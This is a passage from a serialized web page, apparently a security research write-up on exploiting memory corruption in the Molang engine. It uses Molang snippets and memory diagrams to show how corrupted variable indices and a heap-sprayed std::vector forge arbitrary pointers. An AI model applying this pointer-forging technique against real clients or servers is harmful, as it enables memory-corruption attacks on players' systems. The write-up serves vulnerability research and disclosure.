float, which causes two major problems:",{"type":24,"tag":2655,"props":6958,"children":6959},{},[6960,6973],{"type":24,"tag":2659,"props":6961,"children":6962},{},[6963,6965,6971],{"type":30,"value":6964},"The pointer increment is inconsistent because of ASLR. If the lower 32 bits of the address are larger than ",{"type":24,"tag":145,"props":6966,"children":6968},{"className":6967},[],[6969],{"type":30,"value":6970},"FLT_MAX",{"type":30,"value":6972},", the value becomes an invalid float causing the increment operation to fail.",{"type":24,"tag":2659,"props":6974,"children":6975},{},[6976,6978,6983,6985,6990,6991,6996,6998,7003],{"type":30,"value":6977},"As noted before, during assignment, ",{"type":24,"tag":145,"props":6979,"children":6981},{"className":6980},[],[6982],{"type":30,"value":5920},{"type":30,"value":6984}," fields are copied, and the ",{"type":24,"tag":145,"props":6986,"children":6988},{"className":6987},[],[6989],{"type":30,"value":5958},{"type":30,"value":6014},{"type":24,"tag":145,"props":6992,"children":6994},{"className":6993},[],[6995],{"type":30,"value":6020},{"type":30,"value":6997},". Since our source ",{"type":24,"tag":145,"props":6999,"children":7001},{"className":7000},[],[7002],{"type":30,"value":5920},{"type":30,"value":7004}," (calculation rvalue) only has the lower 32 bits populated (due to the 32-bit float type), the upper 32 bits of the destination address are always erased.",{"type":24,"tag":32,"props":7006,"children":7007},{},[7008],{"type":30,"value":7009},"Because of these issues, this idea alone wouldn’t work. We needed to either adjust our approach or come up with an entirely new one.",{"type":24,"tag":270,"props":7011,"children":7013},{"id":7012},"expanding-the-idea",[7014],{"type":30,"value":7015},"Expanding the Idea",{"type":24,"tag":32,"props":7017,"children":7018},{},[7019,7021,7027,7029,7034,7036,7042,7044,7049],{"type":30,"value":7020},"As mentioned earlier, the ",{"type":24,"tag":145,"props":7022,"children":7024},{"className":7023},[],[7025],{"type":30,"value":7026},"type",{"type":30,"value":7028}," field of ",{"type":24,"tag":145,"props":7030,"children":7032},{"className":7031},[],[7033],{"type":30,"value":5920},{"type":30,"value":7035}," is a ",{"type":24,"tag":145,"props":7037,"children":7039},{"className":7038},[],[7040],{"type":30,"value":7041},"uint32_t",{"type":30,"value":7043},". During assignment, the upper 32 bits are not touched and therefore remain uninitialized. This can be observed in the debugger screenshot above - the 32 bits directly below the ",{"type":24,"tag":145,"props":7045,"children":7047},{"className":7046},[],[7048],{"type":30,"value":5958},{"type":30,"value":7050}," field remain unchanged before and after Molang execution.",{"type":24,"tag":32,"props":7052,"children":7053},{},[7054,7056,7061],{"type":30,"value":7055},"Because of this, we thought that we could corrupt two variables instead of just one. The plan was to modify the lower 32 bits of a variable pointer using one corrupted variable, and then restore the upper 32 bits with another corrupted variable pointing to the ",{"type":24,"tag":145,"props":7057,"children":7059},{"className":7058},[],[7060],{"type":30,"value":6033},{"type":30,"value":7062},"’s allocated buffer + 4.",{"type":24,"tag":32,"props":7064,"children":7065},{},[7066,7068,7073,7075,7080,7082,7087,7088,7094],{"type":30,"value":7067},"In the example below, ",{"type":24,"tag":145,"props":7069,"children":7071},{"className":7070},[],[7072],{"type":30,"value":6464},{"type":30,"value":7074}," points to ",{"type":24,"tag":145,"props":7076,"children":7078},{"className":7077},[],[7079],{"type":30,"value":6033},{"type":30,"value":7081},", while ",{"type":24,"tag":145,"props":7083,"children":7085},{"className":7084},[],[7086],{"type":30,"value":6478},{"type":30,"value":7074},{"type":24,"tag":145,"props":7089,"children":7091},{"className":7090},[],[7092],{"type":30,"value":7093},"MolangVariableMap + 4",{"type":30,"value":1679},{"type":24,"tag":291,"props":7096,"children":7098},{"code":7097}," variable.f pointer \n | \n +-------------+-------------+\n v v\n \n +-------------+-------------+\n | a0 bb cc dd | 80 1c 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-------------------+ \n+-------------+ \n| . . . | \n",[7099],{"type":24,"tag":145,"props":7100,"children":7101},{"__ignoreMap":7},[7102],{"type":30,"value":7097},{"type":24,"tag":32,"props":7104,"children":7105},{},[7106,7108,7113,7114,7119,7121,7126,7128,7133,7135,7140],{"type":30,"value":7107},"Here, the ",{"type":24,"tag":145,"props":7109,"children":7111},{"className":7110},[],[7112],{"type":30,"value":5958},{"type":30,"value":7028},{"type":24,"tag":145,"props":7115,"children":7117},{"className":7116},[],[7118],{"type":30,"value":6464},{"type":30,"value":7120}," starts at the lower 32 bits of the ",{"type":24,"tag":145,"props":7122,"children":7124},{"className":7123},[],[7125],{"type":30,"value":6534},{"type":30,"value":7127}," pointer, while ",{"type":24,"tag":145,"props":7129,"children":7131},{"className":7130},[],[7132],{"type":30,"value":6478},{"type":30,"value":7134}," starts at the upper 32 bits. This means we can store the upper 32 bits of the ",{"type":24,"tag":145,"props":7136,"children":7138},{"className":7137},[],[7139],{"type":30,"value":6534},{"type":30,"value":7141}," pointer in a separate variable:",{"type":24,"tag":291,"props":7143,"children":7145},{"code":7144},"variable.saved_upper_32 = variable.b;\n",[7146],{"type":24,"tag":145,"props":7147,"children":7148},{"__ignoreMap":7},[7149],{"type":30,"value":7144},{"type":24,"tag":32,"props":7151,"children":7152},{},[7153],{"type":30,"value":7154},"Then we can modify the lower 32 bits of the pointer:",{"type":24,"tag":291,"props":7156,"children":7158},{"code":7157},"variable.a = variable.a + itof(0x8);\n",[7159],{"type":24,"tag":145,"props":7160,"children":7161},{"__ignoreMap":7},[7162],{"type":30,"value":7157},{"type":24,"tag":32,"props":7164,"children":7165},{},[7166],{"type":30,"value":7167},"After this operation, the upper 32 bits are cleared while the lower bits are adjusted:",{"type":24,"tag":291,"props":7169,"children":7171},{"code":7170}," +-------------+-------------+\n | a8 bb cc dd | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-------------------+ \n+-------------+ \n| . . . | \n",[7172],{"type":24,"tag":145,"props":7173,"children":7174},{"__ignoreMap":7},[7175],{"type":30,"value":7170},{"type":24,"tag":32,"props":7177,"children":7178},{},[7179,7181,7186],{"type":30,"value":7180},"Since the 32 bits directly below the ",{"type":24,"tag":145,"props":7182,"children":7184},{"className":7183},[],[7185],{"type":30,"value":5958},{"type":30,"value":7187}," field remain untouched during assignment, we can simply restore the upper bits:",{"type":24,"tag":291,"props":7189,"children":7191},{"code":7190},"variable.b = variable.saved_upper_32;\n",[7192],{"type":24,"tag":145,"props":7193,"children":7194},{"__ignoreMap":7},[7195],{"type":30,"value":7190},{"type":24,"tag":32,"props":7197,"children":7198},{},[7199,7201,7206],{"type":30,"value":7200},"Now ",{"type":24,"tag":145,"props":7202,"children":7204},{"className":7203},[],[7205],{"type":30,"value":6534},{"type":30,"value":7207}," pointer is restored and we've incremented it by 8, achieving the desired state:",{"type":24,"tag":291,"props":7209,"children":7211},{"code":7210}," +-------------+-------------+\n | a8 bb cc dd | 80 1c 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-------------------+ \n+-------------+ \n| . . . | \n",[7212],{"type":24,"tag":145,"props":7213,"children":7214},{"__ignoreMap":7},[7215],{"type":30,"value":7210},{"type":24,"tag":32,"props":7217,"children":7218},{},[7219,7221,7226],{"type":30,"value":7220},"This bypasses the issue of the upper 32 bits being cleared, but raises another question: how do we find a pointer to ",{"type":24,"tag":145,"props":7222,"children":7224},{"className":7223},[],[7225],{"type":30,"value":7093},{"type":30,"value":7227}," on the heap?",{"type":24,"tag":32,"props":7229,"children":7230},{},[7231,7233,7238,7240,7246],{"type":30,"value":7232},"Additionally, adding 8 to ",{"type":24,"tag":145,"props":7234,"children":7236},{"className":7235},[],[7237],{"type":30,"value":6464},{"type":30,"value":7239}," in the example above wouldn’t work because ",{"type":24,"tag":145,"props":7241,"children":7243},{"className":7242},[],[7244],{"type":30,"value":7245},"0xddccbba0",{"type":30,"value":7247}," is not a valid float. So the first issue still remains unresolved.",{"type":24,"tag":270,"props":7249,"children":7251},{"id":7250},"the-final-approach",[7252],{"type":30,"value":7253},"The Final Approach",{"type":24,"tag":32,"props":7255,"children":7256},{},[7257,7259,7264,7266,7272],{"type":30,"value":7258},"We realized that instead of having the second pointer at ",{"type":24,"tag":145,"props":7260,"children":7262},{"className":7261},[],[7263],{"type":30,"value":7093},{"type":30,"value":7265},", we could instead have it at ",{"type":24,"tag":145,"props":7267,"children":7269},{"className":7268},[],[7270],{"type":30,"value":7271},"MolangVariableMap + 2",{"type":30,"value":7273},", which would resolve both of our issues.",{"type":24,"tag":32,"props":7275,"children":7276},{},[7277,7279,7284,7285,7290],{"type":30,"value":7278},"Let’s revisit the previous example, but this time ",{"type":24,"tag":145,"props":7280,"children":7282},{"className":7281},[],[7283],{"type":30,"value":6478},{"type":30,"value":7074},{"type":24,"tag":145,"props":7286,"children":7288},{"className":7287},[],[7289],{"type":30,"value":7271},{"type":30,"value":1679},{"type":24,"tag":291,"props":7292,"children":7294},{"code":7293}," +-------------+-------------+\n | a0 bb cc dd | 80 1c 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7295],{"type":24,"tag":145,"props":7296,"children":7297},{"__ignoreMap":7},[7298],{"type":30,"value":7293},{"type":24,"tag":32,"props":7300,"children":7301},{},[7302,7304,7309],{"type":30,"value":7303},"With this setup, we can calculate any address relative to ",{"type":24,"tag":145,"props":7305,"children":7307},{"className":7306},[],[7308],{"type":30,"value":6534},{"type":30,"value":7310}," by first saving the upper 48 bits of the address:",{"type":24,"tag":291,"props":7312,"children":7314},{"code":7313},"variable.saved_upper_48 = variable.b;\n",[7315],{"type":24,"tag":145,"props":7316,"children":7317},{"__ignoreMap":7},[7318],{"type":30,"value":7313},{"type":24,"tag":32,"props":7320,"children":7321},{},[7322,7324,7330,7332,7338],{"type":30,"value":7323},"At this point, ",{"type":24,"tag":145,"props":7325,"children":7327},{"className":7326},[],[7328],{"type":30,"value":7329},"variable.saved_upper_48",{"type":30,"value":7331}," holds the value ",{"type":24,"tag":145,"props":7333,"children":7335},{"className":7334},[],[7336],{"type":30,"value":7337},"0x1c80ddcc",{"type":30,"value":206},{"type":24,"tag":32,"props":7340,"children":7341},{},[7342],{"type":30,"value":7343},"To fix our earlier problem of being unable to increment invalid float values, we can simply clear the upper 48 bits:",{"type":24,"tag":291,"props":7345,"children":7347},{"code":7346},"variable.b = 0;\n",[7348],{"type":24,"tag":145,"props":7349,"children":7350},{"__ignoreMap":7},[7351],{"type":30,"value":7346},{"type":24,"tag":32,"props":7353,"children":7354},{},[7355],{"type":30,"value":7356},"Resulting in the following state:",{"type":24,"tag":291,"props":7358,"children":7360},{"code":7359}," +-------------+-------------+\n | a0 bb 00 00 | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7361],{"type":24,"tag":145,"props":7362,"children":7363},{"__ignoreMap":7},[7364],{"type":30,"value":7359},{"type":24,"tag":32,"props":7366,"children":7367},{},[7368,7370,7375,7377,7383,7385,7390],{"type":30,"value":7369},"Now, the value of ",{"type":24,"tag":145,"props":7371,"children":7373},{"className":7372},[],[7374],{"type":30,"value":6464},{"type":30,"value":7376}," only spans 16 bits (",{"type":24,"tag":145,"props":7378,"children":7380},{"className":7379},[],[7381],{"type":30,"value":7382},"0xbba0",{"type":30,"value":7384}," specifically), which is always a valid float since it’s far below ",{"type":24,"tag":145,"props":7386,"children":7388},{"className":7387},[],[7389],{"type":30,"value":6970},{"type":30,"value":206},{"type":24,"tag":32,"props":7392,"children":7393},{},[7394,7396,7401],{"type":30,"value":7395},"We can now safely adjust the lower 16 bits of the pointer by incrementing ",{"type":24,"tag":145,"props":7397,"children":7399},{"className":7398},[],[7400],{"type":30,"value":6464},{"type":30,"value":1679},{"type":24,"tag":291,"props":7403,"children":7404},{"code":7157},[7405],{"type":24,"tag":145,"props":7406,"children":7407},{"__ignoreMap":7},[7408],{"type":30,"value":7157},{"type":24,"tag":32,"props":7410,"children":7411},{},[7412],{"type":30,"value":7413},"Which results in:",{"type":24,"tag":291,"props":7415,"children":7417},{"code":7416}," +-------------+-------------+\n | a8 bb 00 00 | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7418],{"type":24,"tag":145,"props":7419,"children":7420},{"__ignoreMap":7},[7421],{"type":30,"value":7416},{"type":24,"tag":32,"props":7423,"children":7424},{},[7425],{"type":30,"value":7426},"If we only wanted to increment the pointer by 8, we could finish by restoring the upper 48 bits:",{"type":24,"tag":291,"props":7428,"children":7430},{"code":7429},"variable.b = variable.saved_upper_48;\n",[7431],{"type":24,"tag":145,"props":7432,"children":7433},{"__ignoreMap":7},[7434],{"type":30,"value":7429},{"type":24,"tag":32,"props":7436,"children":7437},{},[7438],{"type":30,"value":7439},"Yielding a valid pointer again:",{"type":24,"tag":291,"props":7441,"children":7443},{"code":7442}," +-------------+-------------+\n | a8 bb cc dd | 80 1c 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7444],{"type":24,"tag":145,"props":7445,"children":7446},{"__ignoreMap":7},[7447],{"type":30,"value":7442},{"type":24,"tag":32,"props":7449,"children":7450},{},[7451],{"type":30,"value":7452},"However, if we wanted to increment the pointer by a value larger than 16 bits can represent, we would continue by first saving the adjusted lower 16 bits:",{"type":24,"tag":291,"props":7454,"children":7456},{"code":7455},"variable.saved_adjusted_lower_16 = variable.a;\n",[7457],{"type":24,"tag":145,"props":7458,"children":7459},{"__ignoreMap":7},[7460],{"type":30,"value":7455},{"type":24,"tag":32,"props":7462,"children":7463},{},[7464],{"type":30,"value":7465},"Next, we need to extract the middle and upper 16 bits of the address. We start by restoring the previously saved upper 48 bits:",{"type":24,"tag":291,"props":7467,"children":7469},{"code":7468},"variable.a = variable.saved_upper_48;\n",[7470],{"type":24,"tag":145,"props":7471,"children":7472},{"__ignoreMap":7},[7473],{"type":30,"value":7468},{"type":24,"tag":32,"props":7475,"children":7476},{},[7477],{"type":30,"value":7478},"This produces the following state:",{"type":24,"tag":291,"props":7480,"children":7482},{"code":7481}," +-------------+-------------+\n | cc dd 80 1c | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7483],{"type":24,"tag":145,"props":7484,"children":7485},{"__ignoreMap":7},[7486],{"type":30,"value":7481},{"type":24,"tag":32,"props":7488,"children":7489},{},[7490,7492,7497,7499,7505,7507,7513,7515,7520,7522,7527],{"type":30,"value":7491},"As shown, ",{"type":24,"tag":145,"props":7493,"children":7495},{"className":7494},[],[7496],{"type":30,"value":6478},{"type":30,"value":7498}," now contains the upper 16 bits of the address (",{"type":24,"tag":145,"props":7500,"children":7502},{"className":7501},[],[7503],{"type":30,"value":7504},"0x1c80",{"type":30,"value":7506},"), which we can store as ",{"type":24,"tag":145,"props":7508,"children":7510},{"className":7509},[],[7511],{"type":30,"value":7512},"variable.saved_upper_16 = variable.b",{"type":30,"value":7514},". Meanwhile, ",{"type":24,"tag":145,"props":7516,"children":7518},{"className":7517},[],[7519],{"type":30,"value":6464},{"type":30,"value":7521}," contains both the middle and upper 16 bits. To isolate the middle bits, we simply clear ",{"type":24,"tag":145,"props":7523,"children":7525},{"className":7524},[],[7526],{"type":30,"value":6478},{"type":30,"value":1679},{"type":24,"tag":291,"props":7529,"children":7530},{"code":7346},[7531],{"type":24,"tag":145,"props":7532,"children":7533},{"__ignoreMap":7},[7534],{"type":30,"value":7346},{"type":24,"tag":32,"props":7536,"children":7537},{},[7538],{"type":30,"value":7539},"Leaving us with:",{"type":24,"tag":291,"props":7541,"children":7543},{"code":7542}," +-------------+-------------+\n | cc dd 00 00 | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7544],{"type":24,"tag":145,"props":7545,"children":7546},{"__ignoreMap":7},[7547],{"type":30,"value":7542},{"type":24,"tag":32,"props":7549,"children":7550},{},[7551],{"type":30,"value":7552},"We can now save the middle 16 bits:",{"type":24,"tag":291,"props":7554,"children":7556},{"code":7555},"variable.saved_middle_16 = variable.a;\n",[7557],{"type":24,"tag":145,"props":7558,"children":7559},{"__ignoreMap":7},[7560],{"type":30,"value":7555},{"type":24,"tag":32,"props":7562,"children":7563},{},[7564],{"type":30,"value":7565},"At this point, we have:",{"type":24,"tag":291,"props":7567,"children":7569},{"code":7568},"variable.saved_adjusted_lower_16 = 0xbba8\nvariable.saved_middle_16 = 0xddcc\nvariable.saved_upper_16 = 0x1c80\n",[7570],{"type":24,"tag":145,"props":7571,"children":7572},{"__ignoreMap":7},[7573],{"type":30,"value":7568},{"type":24,"tag":32,"props":7575,"children":7576},{},[7577],{"type":30,"value":7578},"All three parts are valid float values, ensuring deterministic calculations.",{"type":24,"tag":32,"props":7580,"children":7581},{},[7582],{"type":30,"value":7583},"If we needed to increment the pointer by more than the maximum 16-bit value, we would simply increment the middle and upper parts accordingly:",{"type":24,"tag":291,"props":7585,"children":7587},{"code":7586},"variable.saved_adjusted_middle_16 = variable.saved_middle_16 + itof(0x1);\nvariable.saved_adjusted_upper_16 = variable.saved_upper_16 + itof(0x1);\n",[7588],{"type":24,"tag":145,"props":7589,"children":7590},{"__ignoreMap":7},[7591],{"type":30,"value":7586},{"type":24,"tag":32,"props":7593,"children":7594},{},[7595],{"type":30,"value":7596},"After modifying the three 16-bit parts, we can reconstruct the full pointer by reversing the extraction process. We start by forging the upper 48 bits:",{"type":24,"tag":291,"props":7598,"children":7600},{"code":7599},"variable.a = variable.saved_adjusted_middle_16;\n",[7601],{"type":24,"tag":145,"props":7602,"children":7603},{"__ignoreMap":7},[7604],{"type":30,"value":7599},{"type":24,"tag":32,"props":7606,"children":7607},{},[7608,7610,7615,7616,7622,7623,7629],{"type":30,"value":7609},"Setting ",{"type":24,"tag":145,"props":7611,"children":7613},{"className":7612},[],[7614],{"type":30,"value":6464},{"type":30,"value":6000},{"type":24,"tag":145,"props":7617,"children":7619},{"className":7618},[],[7620],{"type":30,"value":7621},"0xddcd",{"type":30,"value":873},{"type":24,"tag":145,"props":7624,"children":7626},{"className":7625},[],[7627],{"type":30,"value":7628},"0xddcc + 1",{"type":30,"value":7630},"), and then:",{"type":24,"tag":291,"props":7632,"children":7634},{"code":7633},"variable.b = variable.saved_adjusted_upper_16;\n",[7635],{"type":24,"tag":145,"props":7636,"children":7637},{"__ignoreMap":7},[7638],{"type":30,"value":7633},{"type":24,"tag":32,"props":7640,"children":7641},{},[7642,7644,7649,7651,7657,7658,7664],{"type":30,"value":7643},"Resulting in ",{"type":24,"tag":145,"props":7645,"children":7647},{"className":7646},[],[7648],{"type":30,"value":6478},{"type":30,"value":7650}," value becoming ",{"type":24,"tag":145,"props":7652,"children":7654},{"className":7653},[],[7655],{"type":30,"value":7656},"0x1c81",{"type":30,"value":873},{"type":24,"tag":145,"props":7659,"children":7661},{"className":7660},[],[7662],{"type":30,"value":7663},"0x1c80 + 1",{"type":30,"value":7665},"):",{"type":24,"tag":291,"props":7667,"children":7669},{"code":7668}," +-------------+-------------+\n | cd dd 81 1c | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7670],{"type":24,"tag":145,"props":7671,"children":7672},{"__ignoreMap":7},[7673],{"type":30,"value":7668},{"type":24,"tag":32,"props":7675,"children":7676},{},[7677],{"type":30,"value":7678},"Now we save the adjusted upper 48 bits:",{"type":24,"tag":291,"props":7680,"children":7682},{"code":7681},"variable.saved_adjusted_upper_48 = variable.a;\n",[7683],{"type":24,"tag":145,"props":7684,"children":7685},{"__ignoreMap":7},[7686],{"type":30,"value":7681},{"type":24,"tag":32,"props":7688,"children":7689},{},[7690],{"type":30,"value":7691},"Finally, we attach the lower 16 bits:",{"type":24,"tag":291,"props":7693,"children":7695},{"code":7694},"variable.a = variable.saved_adjusted_lower_16;\n",[7696],{"type":24,"tag":145,"props":7697,"children":7698},{"__ignoreMap":7},[7699],{"type":30,"value":7694},{"type":24,"tag":291,"props":7701,"children":7703},{"code":7702}," +-------------+-------------+\n | a8 bb 00 00 | 00 00 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7704],{"type":24,"tag":145,"props":7705,"children":7706},{"__ignoreMap":7},[7707],{"type":30,"value":7702},{"type":24,"tag":32,"props":7709,"children":7710},{},[7711],{"type":30,"value":7712},"And by setting:",{"type":24,"tag":291,"props":7714,"children":7716},{"code":7715},"variable.b = variable.saved_adjusted_upper_48;\n",[7717],{"type":24,"tag":145,"props":7718,"children":7719},{"__ignoreMap":7},[7720],{"type":30,"value":7715},{"type":24,"tag":32,"props":7722,"children":7723},{},[7724],{"type":30,"value":7725},"We forge the final adjusted pointer:",{"type":24,"tag":291,"props":7727,"children":7729},{"code":7728}," +-------------+-------------+\n | a8 bb cd dd | 81 1c 00 00 |\n +-------------+-------------+\n ^ ^ \n+-------------+ | | \n| variable.a +-----+ | \n+-------------+ | \n| variable.b +-----------+ \n+-------------+ \n| . . . | \n",[7730],{"type":24,"tag":145,"props":7731,"children":7732},{"__ignoreMap":7},[7733],{"type":30,"value":7728},{"type":24,"tag":2719,"props":7735,"children":7736},{},[],{"type":24,"tag":32,"props":7738,"children":7739},{},[7740,7742,7747],{"type":30,"value":7741},"With this, we now have a method to calculate any pointer we want. However, the previous question still remains: how do we find a pointer to ",{"type":24,"tag":145,"props":7743,"children":7745},{"className":7744},[],[7746],{"type":30,"value":7271},{"type":30,"value":7227},{"type":24,"tag":32,"props":7749,"children":7750},{},[7751,7753,7758,7760,7766,7768,7774,7776,7781],{"type":30,"value":7752},"Eventually, we realized that we don’t necessarily need a pointer to ",{"type":24,"tag":145,"props":7754,"children":7756},{"className":7755},[],[7757],{"type":30,"value":7271},{"type":30,"value":7759},". Instead, we need any two pointers on the heap - one pointing to ",{"type":24,"tag":145,"props":7761,"children":7763},{"className":7762},[],[7764],{"type":30,"value":7765},"addr",{"type":30,"value":7767}," and the other to ",{"type":24,"tag":145,"props":7769,"children":7771},{"className":7770},[],[7772],{"type":30,"value":7773},"addr + 2",{"type":30,"value":7775}," (as long as ",{"type":24,"tag":145,"props":7777,"children":7779},{"className":7778},[],[7780],{"type":30,"value":7765},{"type":30,"value":7782}," lies within a writable region). The idea is to use these two pointers as a workspace where we can split, manipulate, and reconstruct a pointer.",{"type":24,"tag":32,"props":7784,"children":7785},{},[7786,7788,7793,7794,7799],{"type":30,"value":7787},"In this case, we need to corrupt an index of an additional (third) variable and make it index the ",{"type":24,"tag":145,"props":7789,"children":7791},{"className":7790},[],[7792],{"type":30,"value":3129},{"type":30,"value":7028},{"type":24,"tag":145,"props":7795,"children":7797},{"className":7796},[],[7798],{"type":30,"value":6033},{"type":30,"value":7800}," - once the new pointer is forged we can use this variable to assign it the forged pointer:",{"type":24,"tag":291,"props":7802,"children":7804},{"code":7803},"variable.corrupted_var_map_ptr = variable.a;\n",[7805],{"type":24,"tag":145,"props":7806,"children":7807},{"__ignoreMap":7},[7808],{"type":30,"value":7803},{"type":24,"tag":32,"props":7810,"children":7811},{},[7812,7814,7819,7821,7827],{"type":30,"value":7813},"As mentioned earlier, this operation copies the entire 64-bit ",{"type":24,"tag":145,"props":7815,"children":7817},{"className":7816},[],[7818],{"type":30,"value":5958},{"type":30,"value":7820}," field (in this case, the reconstructed pointer) and writes it to ",{"type":24,"tag":145,"props":7822,"children":7824},{"className":7823},[],[7825],{"type":30,"value":7826},"variable.corrupted_var_map_ptr",{"type":30,"value":7828},", even though the type itself is only a 32-bit float.",{"type":24,"tag":270,"props":7830,"children":7832},{"id":7831},"finding-misaligned-pointers",[7833],{"type":30,"value":7834},"Finding Misaligned Pointers",{"type":24,"tag":32,"props":7836,"children":7837},{},[7838,7840,7845,7846,7852],{"type":30,"value":7839},"This step requires a heap-sprayable structure that contains two pointers separated by two bytes (",{"type":24,"tag":145,"props":7841,"children":7843},{"className":7842},[],[7844],{"type":30,"value":3137},{"type":30,"value":2378},{"type":24,"tag":145,"props":7847,"children":7849},{"className":7848},[],[7850],{"type":30,"value":7851},"ptr + 2",{"type":30,"value":7853},"). Fortunately, we didn’t have to look far as we were already familiar with a suitable structure.",{"type":24,"tag":32,"props":7855,"children":7856},{},[7857,7862,7863,7868,7870,7875,7877,7882,7884,7889,7891,7896,7898,7904,7906,7911],{"type":24,"tag":145,"props":7858,"children":7860},{"className":7859},[],[7861],{"type":30,"value":6211},{"type":30,"value":7035},{"type":24,"tag":145,"props":7864,"children":7866},{"className":7865},[],[7867],{"type":30,"value":6234},{"type":30,"value":7869}," found inside every entity object. As noted earlier, a ",{"type":24,"tag":145,"props":7871,"children":7873},{"className":7872},[],[7874],{"type":30,"value":6063},{"type":30,"value":7876}," contains three pointers: ",{"type":24,"tag":145,"props":7878,"children":7880},{"className":7879},[],[7881],{"type":30,"value":3129},{"type":30,"value":7883}," (the start of the allocated buffer), ",{"type":24,"tag":145,"props":7885,"children":7887},{"className":7886},[],[7888],{"type":30,"value":6156},{"type":30,"value":7890}," (just past the last element) and ",{"type":24,"tag":145,"props":7892,"children":7894},{"className":7893},[],[7895],{"type":30,"value":6164},{"type":30,"value":7897}," (the end of the allocated buffer). Because the element type is ",{"type":24,"tag":145,"props":7899,"children":7901},{"className":7900},[],[7902],{"type":30,"value":7903},"uint16_t",{"type":30,"value":7905},", the ",{"type":24,"tag":145,"props":7907,"children":7909},{"className":7908},[],[7910],{"type":30,"value":6156},{"type":30,"value":7912}," pointer advances by 2 bytes each time a new element is added.",{"type":24,"tag":32,"props":7914,"children":7915},{},[7916,7918,7923,7925,7931],{"type":30,"value":7917},"We can make the ",{"type":24,"tag":145,"props":7919,"children":7921},{"className":7920},[],[7922],{"type":30,"value":6156},{"type":30,"value":7924}," pointer equal to ",{"type":24,"tag":145,"props":7926,"children":7928},{"className":7927},[],[7929],{"type":30,"value":7930},"cap - 2",{"type":30,"value":7932}," by adding elements until the vector is one element short of full. In practice this is done by filling the entity with previously unseen variables.",{"type":24,"tag":291,"props":7934,"children":7936},{"code":7935}," +-> +---------------+\n | | |\n | | . . . |\n | | |\n | +-------+-------+\n | | 00 f0 | 00 f1 |\n | +-------+-------+\n | | 00 f2 | 00 f3 |\n | +-------+-------+\n std::vector\u003Cuint16_t> | | 00 f4 | 00 f5 |\n MolangIndexMap | +-------+-------+\n +----------------+ | | 00 f6 | 00 00 |\nbuf | 0x1c54f7a13200 | --+ +-------+-------+\n +----------------+ ^ ^\nlen | 0x1c54f7a13306 | --------------+ |\n +----------------+ |\ncap | 0x1c54f7a13308 | ----------------------+\n +----------------+ \n",[7937],{"type":24,"tag":145,"props":7938,"children":7939},{"__ignoreMap":7},[7940],{"type":30,"value":7935},{"type":24,"tag":2719,"props":7942,"children":7943},{},[],{"type":24,"tag":32,"props":7945,"children":7946},{},[7947,7949,7954,7956,7961,7963,7968,7970,7975,7976,7981],{"type":30,"value":7948},"To summarize - the final setup will require overwriting indices of three variables: one that would index the ",{"type":24,"tag":145,"props":7950,"children":7952},{"className":7951},[],[7953],{"type":30,"value":3129},{"type":30,"value":7955}," pointer of ",{"type":24,"tag":145,"props":7957,"children":7959},{"className":7958},[],[7960],{"type":30,"value":6033},{"type":30,"value":7962}," in the entity object above, one that would index ",{"type":24,"tag":145,"props":7964,"children":7966},{"className":7965},[],[7967],{"type":30,"value":6156},{"type":30,"value":7969}," and the final ",{"type":24,"tag":145,"props":7971,"children":7973},{"className":7972},[],[7974],{"type":30,"value":6164},{"type":30,"value":7955},{"type":24,"tag":145,"props":7977,"children":7979},{"className":7978},[],[7980],{"type":30,"value":6211},{"type":30,"value":7982}," also in the same entity object above.",{"type":24,"tag":32,"props":7984,"children":7985},{},[7986,7988,7994,7995,8001,8003,8008,8009,8014,8016,8021,8023,8028,8029,8034,8036,8041],{"type":30,"value":7987},"The corrupted variables ",{"type":24,"tag":145,"props":7989,"children":7991},{"className":7990},[],[7992],{"type":30,"value":7993},"variable.corrupted_len_ptr",{"type":30,"value":2378},{"type":24,"tag":145,"props":7996,"children":7998},{"className":7997},[],[7999],{"type":30,"value":8000},"variable.corrupted_cap_ptr",{"type":30,"value":8002}," point to ",{"type":24,"tag":145,"props":8004,"children":8006},{"className":8005},[],[8007],{"type":30,"value":6156},{"type":30,"value":2378},{"type":24,"tag":145,"props":8010,"children":8012},{"className":8011},[],[8013],{"type":30,"value":6164},{"type":30,"value":8015},", respectively - they are two bytes apart. With these two we can compute arbitrary pointers using the method previously described. The third corrupted variable, ",{"type":24,"tag":145,"props":8017,"children":8019},{"className":8018},[],[8020],{"type":30,"value":7826},{"type":30,"value":8022},", points to the ",{"type":24,"tag":145,"props":8024,"children":8026},{"className":8025},[],[8027],{"type":30,"value":3129},{"type":30,"value":7028},{"type":24,"tag":145,"props":8030,"children":8032},{"className":8031},[],[8033],{"type":30,"value":6033},{"type":30,"value":8035},"; it is used to copy the calculated pointer into the allocated buffer of ",{"type":24,"tag":145,"props":8037,"children":8039},{"className":8038},[],[8040],{"type":30,"value":6033},{"type":30,"value":8042},", which in turn lets us overwrite a pointer of a different (fourth) variable. That fourth corrupted 